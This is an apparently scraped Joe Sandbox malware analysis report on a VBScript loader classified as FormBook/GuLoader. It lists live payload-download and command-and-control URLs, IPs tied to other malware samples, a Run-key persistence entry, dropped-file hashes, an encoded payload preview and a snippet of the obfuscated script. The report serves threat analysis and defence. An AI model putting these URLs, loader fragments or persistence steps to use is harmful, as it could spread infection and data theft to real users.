                        http://www.387mfyr.sbs/abt9/?Of5HNz9=nO9f1eGtjr/sKzmKQQI1Gqn0vyk6T1iYdf0G+pz4r/6P+DB2OQ61Wxj49dZSRaju4ptYBpim6kquuDHdOrdtP6hUKp5Wb66wssc3rTHo+fACwEvPa+X6vTXJYKXAx7rcdiqsO+f3J/gP&HvxX=KFLDJfalse
                          unknown
                          http://www.beldecor.net/abt9/false
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://ramirex.ro/Rutschebanes.qxdPpowershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmptrue
                              • URL Reputation: malware
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://go.micropowershell.exe, 00000002.00000002.1781282776.00000206167A2000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Licensepowershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://contoso.com/Iconpowershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binBestobs194.59.30.6/HtwvlcDSFcrAhhcHdD97.binwab.exe, 00000012.00000002.1865972215.0000000006970000.00000004.00001000.00020000.00000000.sdmpfalse
                                unknown
                                http://ramirex.ropowershell.exe, 00000002.00000002.1781282776.0000020617316000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1656812613.0000000007215000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://ramirex.ro/HtwvlcDSFcrAhhcHdD97.binawab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://ramirex.ro/Rutschebanes.qxdXRpowershell.exe, 0000000E.00000002.1650625908.0000000004918000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://ramirex.ro/)6wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://aka.ms/pscore6lBpowershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://contoso.com/powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1653655863.000000000582E000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1781282776.0000020615568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1650625908.00000000047C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://ramirex.ro/wab.exe, 00000012.00000002.1866014372.0000000006A18000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://ramirex.ro/uwab.exe, 00000012.00000002.1866014372.0000000006A55000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://ramirex.ropowershell.exe, 00000002.00000002.1781282776.0000020615787000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1781282776.0000020616E42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                137.220.252.40
                                                www.387mfyr.sbsSingapore
                                                64050BCPL-SGBGPNETGlobalASNSGfalse
                                                193.37.145.73
                                                beldecor.netFrance
                                                16347RMI-FITECHFRfalse
                                                37.235.104.9
                                                led-svitidla.euCzech Republic
                                                39392SUPERNETWORK_CZfalse
                                                188.215.50.15
                                                ramirex.roRomania
                                                34358WEBCLASSITROfalse
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1450445
                                                Start date and time:2024-06-01 19:56:44 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 10m 23s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:30
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:2
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:IMG-466573885783553Folketingsmedlemmers.vbs
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.expl.evad.winVBS@21/8@6/4
                                                EGA Information:
                                                • Successful, ratio: 40%
                                                HCA Information:
                                                • Successful, ratio: 85%
                                                • Number of executed functions: 100
                                                • Number of non-executed functions: 262
                                                Cookbook Comments:
                                                • Found application associated with file extension: .vbs
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Execution Graph export aborted for target powershell.exe, PID 6600 because it is empty
                                                • Execution Graph export aborted for target powershell.exe, PID 7668 because it is empty
                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                13:57:39API Interceptor132x Sleep call for process: powershell.exe modified
                                                15:30:14API Interceptor216215x Sleep call for process: clip.exe modified
                                                21:29:44AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FD C:\Program Files (x86)\windows mail\wab.exe
                                                21:29:52AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 1RTLGNO0FD C:\Program Files (x86)\windows mail\wab.exe
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                137.220.252.40ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                • www.387mfyr.sbs/8cgp/
                                                Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.387mfyr.sbs/wu8v/
                                                NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                                                • www.387mfyr.sbs/wu8v/
                                                SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                • www.387mfyr.sbs/wu8v/
                                                COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.387mfyr.sbs/wu8v/
                                                BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.387mfyr.sbs/8cgp/
                                                193.37.145.73IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • www.beldecor.net/abt9/
                                                Vibrant Purchase Order 1624.exeGet hashmaliciousFormBookBrowse
                                                • www.jf-energiesubtil33.fr/f8eq/
                                                kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                • www.jf-energiesubtil33.fr/ve3w/
                                                Inv 070324.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • www.jf-energiesubtil33.fr/f8eq/
                                                NHhH776.exeGet hashmaliciousFormBookBrowse
                                                • www.jf-energiesubtil33.fr/ve3w/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ramirex.roMATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 188.215.50.15
                                                IMG-35235235523525235252532535Selvfinansieret.vbsGet hashmaliciousGuLoaderBrowse
                                                • 188.215.50.15
                                                www.387mfyr.sbsMATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 137.220.252.40
                                                Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 137.220.252.40
                                                anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 137.220.252.40
                                                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 137.220.252.40
                                                ZAM#U00d3WIENIE_NR.2405073.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                • 137.220.252.40
                                                Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 137.220.252.40
                                                NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                                                • 137.220.252.40
                                                SecuriteInfo.com.Win64.PWSX-gen.27230.12502.exeGet hashmaliciousFormBookBrowse
                                                • 137.220.252.40
                                                COMPANY PROFILE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 137.220.252.40
                                                DHL_ES567436735845755676678877988975877.vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 137.220.252.40
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                WEBCLASSITROMATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 188.215.50.15
                                                IMG-35235235523525235252532535Selvfinansieret.vbsGet hashmaliciousGuLoaderBrowse
                                                • 188.215.50.15
                                                BM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 37.251.143.215
                                                nOrden_de_compra.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 89.32.46.159
                                                Project_Offer_2024.exeGet hashmaliciousAgentTeslaBrowse
                                                • 89.32.46.159
                                                ndHq.exeGet hashmaliciousAgentTeslaBrowse
                                                • 89.32.46.159
                                                arm7-20240101-1250.elfGet hashmaliciousMiraiBrowse
                                                • 37.251.157.173
                                                MS Document.htmlGet hashmaliciousPhisherBrowse
                                                • 37.251.137.194
                                                3m37SZRkdC.elfGet hashmaliciousMiraiBrowse
                                                • 37.251.157.145
                                                BCPL-SGBGPNETGlobalASNSGMATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 137.220.252.40
                                                http://spshoesx.top/Get hashmaliciousUnknownBrowse
                                                • 137.220.146.63
                                                http://login.aeosaen.top/Get hashmaliciousUnknownBrowse
                                                • 27.124.47.217
                                                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 137.220.252.40
                                                x64.nn.elfGet hashmaliciousMiraiBrowse
                                                • 137.220.223.49
                                                PDF89gh ReUrgent Quotepdf.exeGet hashmaliciousFormBookBrowse
                                                • 1.32.254.242
                                                Product Listsd#U0334r#U0334o#U0334w#U0334..exeGet hashmaliciousFormBookBrowse
                                                • 1.32.254.242
                                                https://aeno.co.jp.yc-zg.com/aeonGet hashmaliciousUnknownBrowse
                                                • 137.220.217.132
                                                https://aeno.co.jp.slksg.com/aeonGet hashmaliciousUnknownBrowse
                                                • 137.220.217.132
                                                https://aeno.co.jp.xianchui.net/aeonGet hashmaliciousUnknownBrowse
                                                • 137.220.217.132
                                                RMI-FITECHFRIMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 193.37.145.73
                                                w5c8CHID77.exeGet hashmaliciousUnknownBrowse
                                                • 185.135.132.103
                                                sDcscN5fmS.exeGet hashmaliciousFormBookBrowse
                                                • 185.98.131.152
                                                PURCHASE ORDER.docGet hashmaliciousFormBookBrowse
                                                • 185.98.131.152
                                                Vibrant Purchase Order 1624.exeGet hashmaliciousFormBookBrowse
                                                • 193.37.145.73
                                                p8OI6WMicj.elfGet hashmaliciousMiraiBrowse
                                                • 37.18.170.8
                                                s3vFuDz184.elfGet hashmaliciousMiraiBrowse
                                                • 62.102.238.253
                                                Company profile.pif.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                • 185.135.132.99
                                                NdYuOgHbM9.exeGet hashmaliciousFormBookBrowse
                                                • 185.135.132.99
                                                kargonuzu do#U011frulay#U0131n_05082024-Ref_#0123647264823.exeGet hashmaliciousFormBookBrowse
                                                • 193.37.145.73
                                                SUPERNETWORK_CZMATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 37.235.104.9
                                                IMG-466573885783553Folketingsmedlemmers.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                • 37.235.104.9
                                                RFQ0240515.XLS.bat.exeGet hashmaliciousFormBookBrowse
                                                • 37.235.104.9
                                                https://filetransfer.io/data-package/LGjfkuMP/downloadGet hashmaliciousUnknownBrowse
                                                • 46.234.105.221
                                                x607DB0i08.exeGet hashmaliciousPushdoBrowse
                                                • 88.86.118.82
                                                x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                                                • 88.86.118.82
                                                EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                                                • 88.86.118.82
                                                https://26355.wexbo.com/files/other/pcm_company.pdfGet hashmaliciousHTMLPhisherBrowse
                                                • 95.168.193.75
                                                CX17SY6xF6.exeGet hashmaliciousPushdoBrowse
                                                • 88.86.118.82
                                                Planilhas.xlsx.com.exeGet hashmaliciousUnknownBrowse
                                                • 46.234.108.120
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eSWIFT 103 202405291545524610 290524.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                ORDER STBK05047.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 188.215.50.15
                                                Salary List.vbsGet hashmaliciousGuLoaderBrowse
                                                • 188.215.50.15
                                                Purchase Order No.P7696#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 188.215.50.15
                                                r____________PO240515001.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                EnR0HIiSFf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                • 188.215.50.15
                                                Oferta de asociaci#U00f3n para nuestro proyecto de junio.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                z2InvoiceConfirmation3.batGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                rAWB76209811980-8755785874087547656x44433-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 188.215.50.15
                                                z16INVOICE07.batGet hashmaliciousUnknownBrowse
                                                • 188.215.50.15
                                                37f463bf4616ecd445d4a1937da06e19SWIFT 103 202405291545524610 290524.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                ORDER STBK05047.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Program.Unwanted.4662.20461.1147.exeGet hashmaliciousUnknownBrowse
                                                • 188.215.50.15
                                                file.exeGet hashmaliciousVidarBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win32.PWSX-gen.3407.10323.exeGet hashmaliciousCryptOne, VidarBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                • 188.215.50.15
                                                0x001900000002ab40-59.exeGet hashmaliciousArc StealerBrowse
                                                • 188.215.50.15
                                                MATALJ Kft Rendel#U00e9s H634667478874873845985309802Thayne.batGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                • 188.215.50.15
                                                SecuriteInfo.com.Win32.DropperX-gen.2332.10313.exeGet hashmaliciousLummaCBrowse
                                                • 188.215.50.15
                                                temp2.vbsGet hashmaliciousGuLoaderBrowse
                                                • 188.215.50.15
                                                No context
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):11608
                                                Entropy (8bit):4.8908305915084105
                                                Encrypted:false
                                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                Malicious:false
                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1940658735648508
                                                Encrypted:false
                                                SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                Malicious:false
                                                Preview:@...e................................................@..........
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Windows\SysWOW64\clip.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                Category:modified
                                                Size (bytes):196608
                                                Entropy (8bit):1.1215420383712111
                                                Encrypted:false
                                                SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                Category:dropped
                                                Size (bytes):421548
                                                Entropy (8bit):5.966651016215398
                                                Encrypted:false
                                                SSDEEP:12288:OxGg2qO4Yu6lxLXRoleGiQCRNkCcFdHaByI5tV:Z7qOomLaleSC6ZdHmLV
                                                MD5:E7042BA465F066F0444926875BF66170
                                                SHA1:230F14F3E1285A0B9FCD40546B423C36EC9DFD51
                                                SHA-256:A3E66BE0C9E53E8E5B70E8E652FF35F925A07D7DF33B40BCD54BA51B9CD29B5A
                                                SHA-512:DE3A4786F418A72BFB0F3F0C272E657C89B4B5A4A08483DF3664BEB243AD5F9B000928443314CC5FBD931120099954B8EF7F2DF0AC5A4A57529B8E5BE770B207
                                                Malicious:false
                                                Preview:6wLPi+sCJ8W7qH8MAOsCjHtxAZsDXCQEcQGbcQGbuf0GzHrrAsqRcQGbgfExBh0G6wIdhusCog6B6cwA0XzrAsZ86wJY++sCWfrrAigZujx+hhHrArbL6wJ3AnEBm+sCth0xynEBm+sCkXuJFAvrAn6CcQGb0eLrAiUY6wKIR4PBBHEBm3EBm4H5GIOfA3zL6wIQaHEBm4tEJARxAZtxAZuJw+sCA0XrApnZgcNSyf4AcQGbcQGbunt1b2BxAZvrAsDzgcLH4+kH6wLnkXEBm4HyQllZaHEBm3EBm3EBm+sCLzfrAku/6wLP2YsMEOsC6WzrArVMiQwTcQGb6wI8MELrAlhqcQGbgfrsYQQAddPrApMn6wJ7bYlcJAzrAiW+cQGbge0AAwAAcQGbcQGbi1QkCOsCzSZxAZuLfCQE6wLms3EBm4nrcQGbcQGbgcOcAAAA6wI7fOsC2MhT6wJ7THEBm2pAcQGbcQGbievrAtw16wKOxceDAAEAAAAQrwNxAZvrAn2kgcMAAQAA6wJ+UnEBm1PrAhGjcQGbievrAttZ6wJXdom7BAEAAOsCv5DrAk6BgcMEAQAAcQGb6wL1u1PrAsX5cQGbav/rApm16wJm8YPCBesCMVvrAgCTMfbrArrb6wKl1jHJcQGb6wIuaIsacQGb6wLLiEFxAZvrAp2uORwKdfNxAZvrAsRJRnEBm+sCTtSAfAr7uHXd6wJD9usCvvyLRAr86wKjvnEBmynwcQGb6wLMU//ScQGb6wI5G7rsYQQA6wIMJ3EBmzHA6wJT7+sCq0SLfCQM6wLiz+sCAo2BNAegHWPk6wKlzusCFquDwATrAjZ+6wIBMjnQdeLrAgmScQGbiftxAZtxAZv/13EBm3EBm1fcpl8dQuoBKWCDW8OOViIh6qE06zniE9d4ssgh6rXBD9NKGCtgg7Ep+Nr/JesFZVGLhM2dmKBlYV7BTzYloGVR1WdvUiA8ANcupKCtHUdMSN7jH1ec
                                                File type:ASCII text
                                                Entropy (8bit):4.398131484241901
                                                TrID:
                                                • Visual Basic Script (13500/0) 100.00%
                                                File name:IMG-466573885783553Folketingsmedlemmers.vbs
                                                File size:23'175 bytes
                                                MD5:622f2e2a15eda9d46a0d8ad2d9c3438a
                                                SHA1:3c1f879724659f5274a96a9f5dd39c6ced286a4e
                                                SHA256:0566b9624b3a112acec15ffcc968bbe2543a632412ab1cceafa45bf946962038
                                                SHA512:b46f86213be6b56b064038b36cb0b3378065f8149f3aa9715abcadbeec816dc5a4e9f2006fc3038210d0b44aa0da1e62e29053f20bd676a42cf874c98fe280f3
                                                SSDEEP:192:Z7sDB23T/6sUDYJWuktIJajJumgl8tgOCW4oFML+PfelRJzNWnsP3tmCJJisJWcs:Z7s4lETVEbiqLWSxJXwZYRg5GiEC
                                                TLSH:ECA23075F46FA86BC0B303F96CC1EC4AB7FD625BE504A04A0AD988873DF544D92089D2
                                                File Content Preview:.. ......Function Benzantialdoxime(Farestierne)....Benzantialdoxime = ChrW(Farestierne)....End Function .... ..Skittling = 0.... ..Surfacing= array(71-1+0,69,77,59,72,73,62,59,66,66).... ....Ar6 = Standpatism .... ..Dim Brefrekvens.... ..for Distribut
                                                Icon Hash:68d69b8f86ab9a86
                                                TimestampSource PortDest PortSource IPDest IP
                                                Jun 1, 2024 19:57:41.033173084 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:41.033221960 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:41.033313990 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:41.042233944 CEST49700443192.168.2.7188.215.50.15
                                                Jun 1, 2024 19:57:41.042264938 CEST44349700188.215.50.15192.168.2.7
                                                Jun 1, 2024 19:57:42.216276884 CEST44349700188.215.50.15192.168.2.7
